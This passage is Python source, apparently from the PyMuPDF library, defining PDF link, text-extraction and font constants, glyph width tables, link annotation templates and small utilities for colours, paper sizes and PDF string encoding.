# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# Various PDF Optional Content Flags
# ------------------------------------------------------------------------------
# Desired state changes for optional content groups (layers).
PDF_OC_ON = 0  # switch the optional content group on
PDF_OC_TOGGLE = 1  # invert the current state of the group
PDF_OC_OFF = 2  # switch the optional content group off
# ------------------------------------------------------------------------------
# link kinds and link flags
# ------------------------------------------------------------------------------
# Kinds of link destinations.
LINK_NONE = 0  # no destination
LINK_GOTO = 1  # destination within this document
LINK_URI = 2  # destination is a URI
LINK_LAUNCH = 3  # launch an (external) file
LINK_NAMED = 4  # execute a named action
LINK_GOTOR = 5  # destination in another ("remote") document

# Bit flags qualifying which parts of a link destination are valid.
LINK_FLAG_L_VALID = 1  # "left" coordinate is valid
LINK_FLAG_T_VALID = 2  # "top" coordinate is valid
LINK_FLAG_R_VALID = 4  # "right" coordinate is valid
LINK_FLAG_B_VALID = 8  # "bottom" coordinate is valid
LINK_FLAG_FIT_H = 16  # fit horizontally
LINK_FLAG_FIT_V = 32  # fit vertically
LINK_FLAG_R_IS_ZOOM = 64  # "right" value is to be taken as zoom factor
# ------------------------------------------------------------------------------
# Text handling flags
# ------------------------------------------------------------------------------
# Horizontal alignment values for text insertion.
TEXT_ALIGN_LEFT = 0
TEXT_ALIGN_CENTER = 1
TEXT_ALIGN_RIGHT = 2
TEXT_ALIGN_JUSTIFY = 3

# Output format selectors for text extraction.
TEXT_OUTPUT_TEXT = 0
TEXT_OUTPUT_HTML = 1
TEXT_OUTPUT_JSON = 2
TEXT_OUTPUT_XML = 3
TEXT_OUTPUT_XHTML = 4

# Bit flags controlling text extraction behavior.
TEXT_PRESERVE_LIGATURES = 1
TEXT_PRESERVE_WHITESPACE = 2
TEXT_PRESERVE_IMAGES = 4
TEXT_INHIBIT_SPACES = 8
TEXT_DEHYPHENATE = 16
TEXT_PRESERVE_SPANS = 32
TEXT_MEDIABOX_CLIP = 64
TEXT_CID_FOR_UNKNOWN_UNICODE = 128

# Flag combination common to every default extraction mode.
_TEXTFLAGS_BASE = (
    TEXT_PRESERVE_LIGATURES
    | TEXT_PRESERVE_WHITESPACE
    | TEXT_MEDIABOX_CLIP
    | TEXT_CID_FOR_UNKNOWN_UNICODE
)

# Default flag sets for the individual text extraction modes.
TEXTFLAGS_WORDS = _TEXTFLAGS_BASE
TEXTFLAGS_BLOCKS = _TEXTFLAGS_BASE
TEXTFLAGS_DICT = _TEXTFLAGS_BASE | TEXT_PRESERVE_IMAGES
TEXTFLAGS_RAWDICT = TEXTFLAGS_DICT
TEXTFLAGS_SEARCH = _TEXTFLAGS_BASE | TEXT_DEHYPHENATE
TEXTFLAGS_HTML = _TEXTFLAGS_BASE | TEXT_PRESERVE_IMAGES
TEXTFLAGS_XHTML = TEXTFLAGS_HTML
TEXTFLAGS_XML = _TEXTFLAGS_BASE
TEXTFLAGS_TEXT = _TEXTFLAGS_BASE
# ------------------------------------------------------------------------------
# Simple text encoding options
# ------------------------------------------------------------------------------
# Script selectors for simple (8-bit) font encodings.
TEXT_ENCODING_LATIN = 0
TEXT_ENCODING_GREEK = 1
TEXT_ENCODING_CYRILLIC = 2
# ------------------------------------------------------------------------------
# Stamp annotation icon numbers
# ------------------------------------------------------------------------------
# Icon ids selectable for "Stamp" annotations; each id corresponds to the
# standard stamp text of the same name.
STAMP_Approved = 0
STAMP_AsIs = 1
STAMP_Confidential = 2
STAMP_Departmental = 3
STAMP_Experimental = 4
STAMP_Expired = 5
STAMP_Final = 6
STAMP_ForComment = 7
STAMP_ForPublicRelease = 8
STAMP_NotApproved = 9
STAMP_NotForPublicRelease = 10
STAMP_Sold = 11
STAMP_TopSecret = 12
STAMP_Draft = 13
# ------------------------------------------------------------------------------
# Base 14 font names and dictionary
# ------------------------------------------------------------------------------
# The canonical names of the PDF "Base 14" standard fonts.
Base14_fontnames = (
    "Courier",
    "Courier-Oblique",
    "Courier-Bold",
    "Courier-BoldOblique",
    "Helvetica",
    "Helvetica-Oblique",
    "Helvetica-Bold",
    "Helvetica-BoldOblique",
    "Times-Roman",
    "Times-Italic",
    "Times-Bold",
    "Times-BoldItalic",
    "Symbol",
    "ZapfDingbats",
)

# Map lower-cased full names to the canonical Base-14 font name.
# A dict comprehension avoids the previous manual loop and its 'del f'
# cleanup of the leaked loop variable.
Base14_fontdict = {f.lower(): f for f in Base14_fontnames}

# Also accept the traditional 4-letter abbreviations as keys.
Base14_fontdict.update(
    {
        "helv": "Helvetica",
        "heit": "Helvetica-Oblique",
        "hebo": "Helvetica-Bold",
        "hebi": "Helvetica-BoldOblique",
        "cour": "Courier",
        "coit": "Courier-Oblique",
        "cobo": "Courier-Bold",
        "cobi": "Courier-BoldOblique",
        "tiro": "Times-Roman",
        "tibo": "Times-Bold",
        "tiit": "Times-Italic",
        "tibi": "Times-BoldItalic",
        "symb": "Symbol",
        "zadb": "ZapfDingbats",
    }
)
# Skeleton PDF object sources for link annotations. The %-style placeholders
# are filled in by the link creation code (xref numbers, coordinates, file
# names, rectangle strings). These strings are runtime data - do not reformat.
annot_skel = {
    "goto1": "<</A<</S/GoTo/D[%i 0 R/XYZ %g %g %g]>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # goto page xref + XYZ
    "goto2": "<</A<</S/GoTo/D%s>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # goto named destination
    "gotor1": "<</A<</S/GoToR/D[%i /XYZ %g %g %g]/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # remote goto by page number
    "gotor2": "<</A<</S/GoToR/D%s/F(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # remote goto by named destination
    "launch": "<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # launch external file
    "uri": "<</A<</S/URI/URI(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # URI link
    "named": "<</A<</S/Named/N/%s/Type/Action>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",  # named action
}
class FileDataError(RuntimeError):
    """Raised for documents with file structure issues."""


class FileNotFoundError(RuntimeError):
    """Raised if file does not exist.

    Shadows the builtin of the same name within this module's namespace.
    """


class EmptyFileError(FileDataError):
    """Raised when creating documents from zero-length data."""
# Propagate the Python-level FileDataError class to the C-level code, so the
# implementation layer can raise this exact class.
_set_FileDataError(FileDataError)
def css_for_pymupdf_font(
    fontcode: str, *, CSS: OptStr = None, archive: AnyType = None, name: OptStr = None
) -> str:
    """Create @font-face items for the given fontcode of pymupdf-fonts.

    Creates a CSS font-family for all fonts starting with string 'fontcode'.

    Note:
        The font naming convention in package pymupdf-fonts is "fontcode<sf>",
        where the suffix "sf" is either empty or one of "it", "bo" or "bi",
        representing the regular, italic, bold or bold-italic variant.
        This function creates one @font-face definition per variant and
        collectively assigns the font-family name 'fontcode' (or 'name') to
        them. All fitting font buffers of the pymupdf-fonts package are added
        to the provided archive.

    Args:
        fontcode: (str) font code selecting the font variants to include;
            at most 4 variants are accepted.
        CSS: (str) CSS string to append the @font-face definitions to.
        archive: (Archive, mandatory) where to place the font buffers.
        name: (str) use this as family-name instead of 'fontcode'.

    Returns:
        The modified CSS with appended @font-face statements; the font
        buffers for 'fontcode' have been added to 'archive'.

    Raises:
        ValueError: if 'archive' is not an Archive, or 'fontcode' matches
            no font or more than 4 fonts.
    """
    # @font-face template string
    CSSFONT = "\n@font-face {font-family: %s; src: url(%s);%s%s}\n"

    # isinstance (not exact-type check) so Archive subclasses are accepted
    if not isinstance(archive, Archive):
        raise ValueError("'archive' must be an Archive")
    if CSS is None:
        CSS = ""

    # select font codes starting with the passed-in string
    font_keys = [k for k in fitz_fontdescriptors.keys() if k.startswith(fontcode)]
    if not font_keys:
        raise ValueError(f"No font code '{fontcode}' found in pymupdf-fonts.")
    if len(font_keys) > 4:
        raise ValueError("fontcode too short")

    if name is None:  # use this name for font-family
        name = fontcode

    for fkey in font_keys:
        font = fitz_fontdescriptors[fkey]
        bold = font["bold"]  # determine font property
        italic = font["italic"]  # determine font property
        fbuff = font["loader"]()  # load the fontbuffer
        archive.add(fbuff, fkey)  # update the archive
        bold_text = "font-weight: bold;" if bold else ""
        italic_text = "font-style: italic;" if italic else ""
        CSS += CSSFONT % (name, fkey, bold_text, italic_text)

    return CSS
def get_text_length(text: str, fontname: str ="helv", fontsize: float =11, encoding: int =0) -> float:
    """Calculate length of a string for a built-in font.

    Args:
        text: the string to measure.
        fontname: name of the font (Base-14 name, abbreviation, or CJK code).
        fontsize: font size points.
        encoding: encoding to use, 0=Latin (default), 1=Greek, 2=Cyrillic.

    Returns:
        (float) length of text.

    Raises:
        ValueError: if the font is not supported by this function.
    """
    fontname = fontname.lower()
    basename = Base14_fontdict.get(fontname, None)

    # Symbol and ZapfDingbats carry their own width tables
    glyphs = None
    if basename == "Symbol":
        glyphs = symbol_glyphs
    if basename == "ZapfDingbats":
        glyphs = zapf_glyphs
    if glyphs is not None:
        # chars beyond the 8-bit range use the width of the default glyph 183
        w = sum(glyphs[ord(c)][1] if ord(c) < 256 else glyphs[183][1] for c in text)
        return w * fontsize

    if fontname in Base14_fontdict:  # any other Base-14 font
        return util_measure_string(
            text, Base14_fontdict[fontname], fontsize, encoding
        )

    if fontname in (  # CJK fonts: treated as fixed-width here
        "china-t",
        "china-s",
        "china-ts",
        "china-ss",
        "japan",
        "japan-s",
        "korea",
        "korea-s",
    ):
        return len(text) * fontsize

    raise ValueError("Font '%s' is unsupported" % fontname)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'ZapfDingbats'
# ------------------------------------------------------------------------------
zapf_glyphs = (
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(32, 0.278),
(33, 0.974),
(34, 0.961),
(35, 0.974),
(36, 0.98),
(37, 0.719),
(38, 0.789),
(39, 0.79),
(40, 0.791),
(41, 0.69),
(42, 0.96),
(43, 0.939),
(44, 0.549),
(45, 0.855),
(46, 0.911),
(47, 0.933),
(48, 0.911),
(49, 0.945),
(50, 0.974),
(51, 0.755),
(52, 0.846),
(53, 0.762),
(54, 0.761),
(55, 0.571),
(56, 0.677),
(57, 0.763),
(58, 0.76),
(59, 0.759),
(60, 0.754),
(61, 0.494),
(62, 0.552),
(63, 0.537),
(64, 0.577),
(65, 0.692),
(66, 0.786),
(67, 0.788),
(68, 0.788),
(69, 0.79),
(70, 0.793),
(71, 0.794),
(72, 0.816),
(73, 0.823),
(74, 0.789),
(75, 0.841),
(76, 0.823),
(77, 0.833),
(78, 0.816),
(79, 0.831),
(80, 0.923),
(81, 0.744),
(82, 0.723),
(83, 0.749),
(84, 0.79),
(85, 0.792),
(86, 0.695),
(87, 0.776),
(88, 0.768),
(89, 0.792),
(90, 0.759),
(91, 0.707),
(92, 0.708),
(93, 0.682),
(94, 0.701),
(95, 0.826),
(96, 0.815),
(97, 0.789),
(98, 0.789),
(99, 0.707),
(100, 0.687),
(101, 0.696),
(102, 0.689),
(103, 0.786),
(104, 0.787),
(105, 0.713),
(106, 0.791),
(107, 0.785),
(108, 0.791),
(109, 0.873),
(110, 0.761),
(111, 0.762),
(112, 0.762),
(113, 0.759),
(114, 0.759),
(115, 0.892),
(116, 0.892),
(117, 0.788),
(118, 0.784),
(119, 0.438),
(120, 0.138),
(121, 0.277),
(122, 0.415),
(123, 0.392),
(124, 0.392),
(125, 0.668),
(126, 0.668),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(161, 0.732),
(162, 0.544),
(163, 0.544),
(164, 0.91),
(165, 0.667),
(166, 0.76),
(167, 0.76),
(168, 0.776),
(169, 0.595),
(170, 0.694),
(171, 0.626),
(172, 0.788),
(173, 0.788),
(174, 0.788),
(175, 0.788),
(176, 0.788),
(177, 0.788),
(178, 0.788),
(179, 0.788),
(180, 0.788),
(181, 0.788),
(182, 0.788),
(183, 0.788),
(184, 0.788),
(185, 0.788),
(186, 0.788),
(187, 0.788),
(188, 0.788),
(189, 0.788),
(190, 0.788),
(191, 0.788),
(192, 0.788),
(193, 0.788),
(194, 0.788),
(195, 0.788),
(196, 0.788),
(197, 0.788),
(198, 0.788),
(199, 0.788),
(200, 0.788),
(201, 0.788),
(202, 0.788),
(203, 0.788),
(204, 0.788),
(205, 0.788),
(206, 0.788),
(207, 0.788),
(208, 0.788),
(209, 0.788),
(210, 0.788),
(211, 0.788),
(212, 0.894),
(213, 0.838),
(214, 1.016),
(215, 0.458),
(216, 0.748),
(217, 0.924),
(218, 0.748),
(219, 0.918),
(220, 0.927),
(221, 0.928),
(222, 0.928),
(223, 0.834),
(224, 0.873),
(225, 0.828),
(226, 0.924),
(227, 0.924),
(228, 0.917),
(229, 0.93),
(230, 0.931),
(231, 0.463),
(232, 0.883),
(233, 0.836),
(234, 0.836),
(235, 0.867),
(236, 0.867),
(237, 0.696),
(238, 0.696),
(239, 0.874),
(183, 0.788),
(241, 0.874),
(242, 0.76),
(243, 0.946),
(244, 0.771),
(245, 0.865),
(246, 0.771),
(247, 0.888),
(248, 0.967),
(249, 0.888),
(250, 0.831),
(251, 0.873),
(252, 0.927),
(253, 0.97),
(183, 0.788),
(183, 0.788),
)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'Symbol'
# ------------------------------------------------------------------------------
symbol_glyphs = (
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(32, 0.25),
(33, 0.333),
(34, 0.713),
(35, 0.5),
(36, 0.549),
(37, 0.833),
(38, 0.778),
(39, 0.439),
(40, 0.333),
(41, 0.333),
(42, 0.5),
(43, 0.549),
(44, 0.25),
(45, 0.549),
(46, 0.25),
(47, 0.278),
(48, 0.5),
(49, 0.5),
(50, 0.5),
(51, 0.5),
(52, 0.5),
(53, 0.5),
(54, 0.5),
(55, 0.5),
(56, 0.5),
(57, 0.5),
(58, 0.278),
(59, 0.278),
(60, 0.549),
(61, 0.549),
(62, 0.549),
(63, 0.444),
(64, 0.549),
(65, 0.722),
(66, 0.667),
(67, 0.722),
(68, 0.612),
(69, 0.611),
(70, 0.763),
(71, 0.603),
(72, 0.722),
(73, 0.333),
(74, 0.631),
(75, 0.722),
(76, 0.686),
(77, 0.889),
(78, 0.722),
(79, 0.722),
(80, 0.768),
(81, 0.741),
(82, 0.556),
(83, 0.592),
(84, 0.611),
(85, 0.69),
(86, 0.439),
(87, 0.768),
(88, 0.645),
(89, 0.795),
(90, 0.611),
(91, 0.333),
(92, 0.863),
(93, 0.333),
(94, 0.658),
(95, 0.5),
(96, 0.5),
(97, 0.631),
(98, 0.549),
(99, 0.549),
(100, 0.494),
(101, 0.439),
(102, 0.521),
(103, 0.411),
(104, 0.603),
(105, 0.329),
(106, 0.603),
(107, 0.549),
(108, 0.549),
(109, 0.576),
(110, 0.521),
(111, 0.549),
(112, 0.549),
(113, 0.521),
(114, 0.549),
(115, 0.603),
(116, 0.439),
(117, 0.576),
(118, 0.713),
(119, 0.686),
(120, 0.493),
(121, 0.686),
(122, 0.494),
(123, 0.48),
(124, 0.2),
(125, 0.48),
(126, 0.549),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(183, 0.46),
(160, 0.25),
(161, 0.62),
(162, 0.247),
(163, 0.549),
(164, 0.167),
(165, 0.713),
(166, 0.5),
(167, 0.753),
(168, 0.753),
(169, 0.753),
(170, 0.753),
(171, 1.042),
(172, 0.713),
(173, 0.603),
(174, 0.987),
(175, 0.603),
(176, 0.4),
(177, 0.549),
(178, 0.411),
(179, 0.549),
(180, 0.549),
(181, 0.576),
(182, 0.494),
(183, 0.46),
(184, 0.549),
(185, 0.549),
(186, 0.549),
(187, 0.549),
(188, 1),
(189, 0.603),
(190, 1),
(191, 0.658),
(192, 0.823),
(193, 0.686),
(194, 0.795),
(195, 0.987),
(196, 0.768),
(197, 0.768),
(198, 0.823),
(199, 0.768),
(200, 0.768),
(201, 0.713),
(202, 0.713),
(203, 0.713),
(204, 0.713),
(205, 0.713),
(206, 0.713),
(207, 0.713),
(208, 0.768),
(209, 0.713),
(210, 0.79),
(211, 0.79),
(212, 0.89),
(213, 0.823),
(214, 0.549),
(215, 0.549),
(216, 0.713),
(217, 0.603),
(218, 0.603),
(219, 1.042),
(220, 0.987),
(221, 0.603),
(222, 0.987),
(223, 0.603),
(224, 0.494),
(225, 0.329),
(226, 0.79),
(227, 0.79),
(228, 0.786),
(229, 0.713),
(230, 0.384),
(231, 0.384),
(232, 0.384),
(233, 0.384),
(234, 0.384),
(235, 0.384),
(236, 0.494),
(237, 0.494),
(238, 0.494),
(239, 0.494),
(183, 0.46),
(241, 0.329),
(242, 0.274),
(243, 0.686),
(244, 0.686),
(245, 0.686),
(246, 0.384),
(247, 0.549),
(248, 0.384),
(249, 0.384),
(250, 0.384),
(251, 0.384),
(252, 0.494),
(253, 0.494),
(254, 0.494),
(183, 0.46),
)
class linkDest(object):
    """link or outline destination details.

    Decodes a raw link/outline object ('obj') into attributes: kind (one of
    the LINK_* constants), target page, target point, file spec, URI, etc.
    'rlink' optionally carries a resolved (page, x, y) triple for internal
    destinations.
    """
    def __init__(self, obj, rlink):
        isExt = obj.is_external
        isInt = not isExt
        # default-initialize all public attributes
        self.dest = ""
        self.fileSpec = ""
        self.flags = 0
        self.isMap = False
        self.isUri = False
        self.kind = LINK_NONE
        self.lt = Point(0, 0)  # top-left of target view
        self.named = ""
        self.newWindow = ""
        self.page = obj.page
        self.rb = Point(0, 0)  # bottom-right of target view
        self.uri = obj.uri
        if rlink and not self.uri.startswith("#"):
            # rebuild the uri from the resolved location (1-based page number)
            self.uri = "#page=%i&zoom=0,%g,%g" % (rlink[0] + 1, rlink[1], rlink[2])
        if obj.is_external:
            self.page = -1
            self.kind = LINK_URI
        if not self.uri:
            self.page = -1
            self.kind = LINK_NONE
        if isInt and self.uri:
            # internal destination: "#page=n&zoom=z,x,y", "#page=n", "#name",
            # or a plain named destination
            self.uri = self.uri.replace("&zoom=nan", "&zoom=0")
            if self.uri.startswith("#"):
                self.named = ""
                self.kind = LINK_GOTO
                m = re.match('^#page=([0-9]+)&zoom=([0-9.]+),(-?[0-9.]+),(-?[0-9.]+)$', self.uri)
                if m:
                    self.page = int(m.group(1)) - 1  # 0-based page
                    self.lt = Point(float((m.group(3))), float(m.group(4)))
                    self.flags = self.flags | LINK_FLAG_L_VALID | LINK_FLAG_T_VALID
                else:
                    m = re.match('^#page=([0-9]+)$', self.uri)
                    if m:
                        self.page = int(m.group(1)) - 1
                    else:
                        # "#name": a named destination
                        self.kind = LINK_NAMED
                        self.named = self.uri[1:]
            else:
                self.kind = LINK_NAMED
                self.named = self.uri
        if obj.is_external:
            # external target: web/mail/ftp URI, file launch, or remote goto
            if self.uri.startswith(("http://", "https://", "mailto:", "ftp://")):
                self.isUri = True
                self.kind = LINK_URI
            elif self.uri.startswith("file://"):
                self.fileSpec = self.uri[7:]
                self.isUri = False
                self.uri = ""
                self.kind = LINK_LAUNCH
                ftab = self.fileSpec.split("#")
                if len(ftab) == 2:
                    # "file://path#page=n" means goto-remote, not launch
                    if ftab[1].startswith("page="):
                        self.kind = LINK_GOTOR
                        self.fileSpec = ftab[0]
                        self.page = int(ftab[1][5:]) - 1
            else:
                self.isUri = True
                self.kind = LINK_LAUNCH
# -------------------------------------------------------------------------------
# "Now" timestamp in PDF Format
# -------------------------------------------------------------------------------
def get_pdf_now() -> str:
    """Return the current local time as a PDF-format timestamp string.

    Format is "D:YYYYmmddHHMMSS", followed for non-UTC zones by an offset
    suffix like "-05'00'" or "+01'00'"; no suffix is added for UTC.
    """
    import time

    # NOTE(review): uses time.altzone (the DST zone offset) regardless of
    # whether DST is currently in effect — confirm intended.
    tz = "%s'%s'" % (
        str(abs(time.altzone // 3600)).rjust(2, "0"),
        str((abs(time.altzone // 60) % 60)).rjust(2, "0"),
    )
    tstamp = time.strftime("D:%Y%m%d%H%M%S", time.localtime())
    if time.altzone > 0:  # west of UTC
        tstamp += "-" + tz
    elif time.altzone < 0:  # east of UTC
        tstamp += "+" + tz
    # altzone == 0 (UTC): no suffix (removed dead 'else: pass' branch)
    return tstamp
def get_pdf_str(s: str) -> str:
    """Return a PDF string literal for 's', choosing a suitable encoding.

    Notes:
        ASCII-only input is returned as "(original)" with '(', ')' and '\\'
        escaped. Input restricted to 8-bit characters additionally uses
        octal escapes \\nnn. Anything beyond the 8-bit range yields
        "<FEFF...>": the hex-encoded UTF-16BE form with a BOM.
    """
    if not s:
        return "()"

    def as_utf16be_hex(txt):
        # BOM bytes FE FF followed by the UTF-16BE encoding, hex-dumped
        return "<" + (bytearray([254, 255]) + bytearray(txt, "UTF-16BE")).hex() + ">"

    # control characters with dedicated escapes; everything else unsupported
    # in the 8-bit path is replaced by 0xB7
    control_escapes = {8: "\\b", 9: "\\t", 10: "\\n", 12: "\\f", 13: "\\r"}

    pieces = []
    for ch in s:
        code = ord(ch)
        if code > 255:  # beyond 8-bit range: switch to UTF-16BE wholesale
            return as_utf16be_hex(s)
        if 31 < code < 127:  # printable ASCII
            if ch in "()\\":  # these need to be escaped
                pieces.append("\\")
            pieces.append(ch)
        elif code > 127:  # 8-bit, non-ASCII: octal escape
            pieces.append("\\%03o" % code)
        else:  # control character
            pieces.append(control_escapes.get(code, "\\267"))
    return "(" + "".join(pieces) + ")"
def getTJstr(text: str, glyphs: typing.Union[list, tuple, None], simple: bool, ordering: int) -> str:
    """Return a PDF string in [] brackets, suitable for the PDF TJ operator.

    Notes:
        The input is converted to 2 or 4 hex digits per character.
    Args:
        simple: no glyphs: 2-chars, use char codes as the glyph
                glyphs: 2-chars, use glyphs instead of char codes (Symbol,
                ZapfDingbats)
        not simple: ordering < 0: 4-chars, use glyphs not char codes
                    ordering >=0: a CJK font! 4 chars, use char codes as glyphs
    """
    if text.startswith("[<") and text.endswith(">]"):  # nothing to do
        return text
    if not text:
        return "[<>]"

    if simple:
        # 2-byte hex per char; chars beyond 8-bit map to default glyph 0xB7
        if glyphs is None:
            codes = ("%02x" % ord(c) if ord(c) < 256 else "b7" for c in text)
        else:
            codes = ("%02x" % glyphs[ord(c)][0] if ord(c) < 256 else "b7" for c in text)
    elif ordering < 0:
        # non-simple, non-CJK: 4-byte hex of the glyph ids
        codes = ("%04x" % glyphs[ord(c)][0] for c in text)
    else:
        # CJK font: 4-byte hex of the char codes themselves
        codes = ("%04x" % ord(c) for c in text)
    return "[<" + "".join(codes) + ">]"
def paper_sizes():
    """Return the known paper formats @ 72 dpi as a dictionary.

    Keys are format strings like "a4" (ISO-A4); values are (width, height)
    tuples in points. Sources:
        www.din-formate.de
        www.din-formate.info/amerikanische-formate.html
        www.directtools.de/wissen/normen/iso.htm
    """
    formats = {
        "a0": (2384, 3370),
        "a1": (1684, 2384),
        "a10": (74, 105),
        "a2": (1191, 1684),
        "a3": (842, 1191),
        "a4": (595, 842),
        "a5": (420, 595),
        "a6": (298, 420),
        "a7": (210, 298),
        "a8": (147, 210),
        "a9": (105, 147),
        "b0": (2835, 4008),
        "b1": (2004, 2835),
        "b10": (88, 125),
        "b2": (1417, 2004),
        "b3": (1001, 1417),
        "b4": (709, 1001),
        "b5": (499, 709),
        "b6": (354, 499),
        "b7": (249, 354),
        "b8": (176, 249),
        "b9": (125, 176),
        "c0": (2599, 3677),
        "c1": (1837, 2599),
        "c10": (79, 113),
        "c2": (1298, 1837),
        "c3": (918, 1298),
        "c4": (649, 918),
        "c5": (459, 649),
        "c6": (323, 459),
        "c7": (230, 323),
        "c8": (162, 230),
        "c9": (113, 162),
        "card-4x6": (288, 432),
        "card-5x7": (360, 504),
        "commercial": (297, 684),
        "executive": (522, 756),
        "invoice": (396, 612),
        "ledger": (792, 1224),
        "legal": (612, 1008),
        "legal-13": (612, 936),
        "letter": (612, 792),
        "monarch": (279, 540),
        "tabloid-extra": (864, 1296),
    }
    return formats


def paper_size(s: str) -> tuple:
    """Return a tuple (width, height) for a given paper format string.

    Notes:
        'A4-L' will return (842, 595), the values for A4 landscape.
        Suffix '-P' and no suffix return the portrait tuple. Unknown
        formats yield (-1, -1).
    """
    key = s.lower()
    landscape = key.endswith("-l")
    if landscape:
        key = key[:-2]
    if key.endswith("-p"):  # explicit portrait suffix
        key = key[:-2]
    width, height = paper_sizes().get(key, (-1, -1))
    return (height, width) if landscape else (width, height)
def paper_rect(s: str) -> Rect:
    """Return a Rect for the paper format string 's'.

    's' must conform to the argument of 'paper_size', which is invoked to
    determine width and height.
    """
    w, h = paper_size(s)
    return Rect(0.0, 0.0, w, h)
def CheckParent(o: typing.Any):
    """Raise ValueError if 'o' has no (or a cleared) owning parent object."""
    # 'is None' instead of '== None' (identity test, PEP 8)
    if getattr(o, "parent", None) is None:
        raise ValueError("orphaned object: parent is None")
def EnsureOwnership(o: typing.Any):
    """Raise RuntimeError if 'o' no longer owns its underlying object."""
    owned = getattr(o, "thisown", False)
    if not owned:
        raise RuntimeError("object destroyed")
def CheckColor(c: OptSeq):
    """Validate a color sequence: 1, 3 or 4 components, each in [0, 1].

    Falsy input (None, empty) is accepted silently.
    """
    if not c:
        return
    acceptable = (
        type(c) in (list, tuple)
        and len(c) in (1, 3, 4)
        and min(c) >= 0
        and max(c) <= 1
    )
    if not acceptable:
        raise ValueError("need 1, 3 or 4 color components in range 0 to 1")
def ColorCode(c: typing.Union[list, tuple, float, None], f: str) -> str:
    """Return PDF operator source setting a gray, RGB or CMYK color.

    Args:
        c: a single number (gray) or a sequence of 1, 3 or 4 components.
        f: "c" selects the stroke operator, anything else the fill operator.
    Returns:
        Operator string like "1 0 0 RG ", or "" for falsy input.
    """
    if not c:
        return ""
    if hasattr(c, "__float__"):  # a single number: treat as 1-tuple
        c = (c,)
    CheckColor(c)
    operators = {1: ("G", "g"), 3: ("RG", "rg"), 4: ("K", "k")}
    stroke_op, fill_op = operators[len(c)]
    components = " ".join("%g" % v for v in c)
    chosen = stroke_op if f == "c" else fill_op
    return "%s %s " % (components, chosen)
def JM_TUPLE(o: typing.Sequence) -> tuple:
    """Round items to 5 decimals; values with magnitude < 1e-4 become 0."""
    return tuple(round(x, 5) if abs(x) >= 1e-4 else 0 for x in o)


def JM_TUPLE3(o: typing.Sequence) -> tuple:
    """Round items to 3 decimals; values with magnitude < 1e-3 become 0."""
    return tuple(round(x, 3) if abs(x) >= 1e-3 else 0 for x in o)
def CheckRect(r: typing.Any) -> bool:
    """Check whether an object is non-degenerate rect-like.

    It must be a sequence of 4 numbers.
    """
    try:
        r = Rect(r)
    except Exception:  # narrowed from bare 'except' (would mask SystemExit)
        return False
    return not (r.is_empty or r.is_infinite)
def CheckQuad(q: typing.Any) -> bool:
    """Check whether an object is convex, not empty quad-like.

    It must be a sequence of 4 number pairs.
    """
    try:
        q0 = Quad(q)
    except Exception:  # narrowed from bare 'except' (would mask SystemExit)
        return False
    return q0.is_convex
def CheckMarkerArg(quads: typing.Any) -> tuple:
    """Normalize a rect, a quad, or a sequence of either into quads.

    Raises:
        ValueError: if a sequence item is neither rect-like nor quad-like.
    """
    if CheckRect(quads):  # a single rect: return its quad
        return (Rect(quads).quad,)
    if CheckQuad(quads):  # a single quad
        return (quads,)
    for item in quads:  # otherwise: every element must be rect- or quad-like
        if not (CheckRect(item) or CheckQuad(item)):
            raise ValueError("bad quads entry")
    return quads
def CheckMorph(o: typing.Any) -> bool:
    """Validate a morph argument: a (point-like, matrix-like) pair.

    Returns False for falsy input; True if valid; raises ValueError for a
    malformed pair (the matrix part must have e == f == 0).
    """
    if not o:
        return False
